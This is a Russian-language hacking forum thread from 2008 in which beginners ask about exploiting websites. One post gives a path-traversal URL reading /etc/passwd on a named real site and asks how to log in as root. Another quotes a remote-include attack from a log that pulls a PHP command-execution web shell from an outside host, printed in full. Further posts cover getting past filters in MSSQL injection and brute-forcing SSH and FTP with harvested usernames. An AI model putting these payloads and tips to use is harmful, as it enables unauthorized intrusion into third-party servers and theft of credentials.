ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.03.2008, 12:42
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208
Репутация:
21
|
|
В разделе php инжекции нашел вот такой инжект -
http://www.bristolferry.com/page.php?xPage=../../../../../../../etc/passwd
Пытаюсь приконектится к серверу по SSH программой putty, login: root .
В putty логин ввести можно, а пароль даже не видно как вводит. Нажимаю Enter - пишет, что доступ закрыт. Подскажите пожалуйста, в чём проблема?
И еще, в passwd лежат пароли от пользователей? |
|
|
24.03.2008, 13:24
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094
Репутация:
120
|
|
Подскажите что делает эта инекция?
Пытались применить её к vBulletin.
PHP код:
//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif???
Содержимое странички _http://www.entgiftungspad.de/cache/cmd7.gif
PHP код:
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
|
|
|
|
24.03.2008, 13:54
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Spaise, в /etc/passwd пароли лежали в старых версиях ядер
Сейчас паролей там нет, а лежат они в /etc/shadow - если у тебя Линукс или Соларис, /etc/master.passwd - Если у тебя *BSD
Доступны они только руту
xaker-boss, вообше то это удалённый инклуд в компоненте Мамбо - com_mambowiki, хз как вы пытались его к Булке применить  |
|
|
|
24.03.2008, 14:04
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094
Репутация:
120
|
|
Spyder да эт не я пытался, а меня пытались ламанут, просто загленул в свой ЛОГ и у видел там это.
Спасибо
|
|
|
|
24.03.2008, 16:43
|
|
Познающий
Регистрация: 19.09.2007
Сообщений: 38
Провел на форуме:
424313
Репутация:
2
|
|
Уважаемые господа. Не первый раз сталкиваюсь с такой бедой.
Запрос такого вида :
___http://site.com/lalala/download/download.cfm?companyid=lalala&fileid=lalala&fileke y='
Ошибка такого вида :
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting from a character string to uniqueidentifier.
Вопрос: Что это такое. И где можно прочитать какое то описание, как правильно провести иньекцию.
С удовольствием выслушаю ваши советы.
P.S. И еще вопрос .
1. В MSSQL идет фильтрация на TOP и на From . если вместо TOP я могу еще поставить max то фром мне полюбому нужен.
Что можно сделать в этой ситуации?
Последний раз редактировалось constanta; 24.03.2008 в 16:48..
|
|
|
|
24.03.2008, 16:47
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316
Репутация:
327
|
|
constanta ошибка типа sql-inj
читаем тут http://injection.rulezz.ru/
попробуй закодировать фром
Последний раз редактировалось ReVOLVeR; 24.03.2008 в 16:55..
|
|
|
|
24.03.2008, 16:47
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Ребят скажите, а что полезного можно извлечь из файла - /etc/passwd ???
|
|
|
|
24.03.2008, 16:48
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316
Репутация:
327
|
|
mff логины к ssh которые нередко подходят к фтп
узнать прова на сервере для определённого юзверя
используй для бруа к примеру на совпадение логина и пасса
Последний раз редактировалось ReVOLVeR; 24.03.2008 в 16:50..
|
|
|
|
24.03.2008, 17:19
|
|
Moderator - Level 7
Регистрация: 16.02.2008
Сообщений: 580
Провел на форуме:
1595333
Репутация:
291
|
|
Сообщение от mff
Ребят скажите, а что полезного можно извлечь из файла - /etc/passwd ???
оттуда можно узнать имена пользователей которые существуют в системе.
|
|
|
|
24.03.2008, 17:28
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Спасибо вам ReVOLVeR zythar!
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
